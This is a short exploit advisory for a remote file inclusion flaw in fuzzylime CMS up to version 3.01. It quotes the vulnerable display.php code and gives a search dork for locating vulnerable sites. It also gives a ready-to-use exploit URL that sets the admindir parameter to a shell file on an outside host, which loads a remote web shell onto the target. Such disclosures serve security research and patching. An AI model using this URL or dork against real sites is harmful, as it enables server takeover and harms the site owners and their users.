fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability

2008-03-14 00:00:00

.-----------------------------------------------------------------------------.
| vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability |
| download: http://cms.fuzzylime.co.uk/ |
| dork: "powered by fuzzylime" |
| |
| author: [email protected] |
| homepage: http://irk4z.wordpress.com/ |
| |
| greets to: cOndemned, str0ke, wacky |
'-----------------------------------------------------------------------------'

# code:

/code/display.php:
...
1 <?
2 $s = $_GET[s];
3 $p = $_GET[p];
4 $s = str_replace("../", "", $s);
5 $p = str_replace("../", "", $p);
6 if(empty($s)) $s = "front";
7 if(empty($p)) $p = "index";
8 $curs = $s;
9 $curp = $p;
10
11 include "code/settings.inc.php";
12 include "${admindir}/languages/english.inc.php";
...

line 11: ./code/code/settings.inc.php not exists so $admindir is empty :D:D

# exploit:

http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.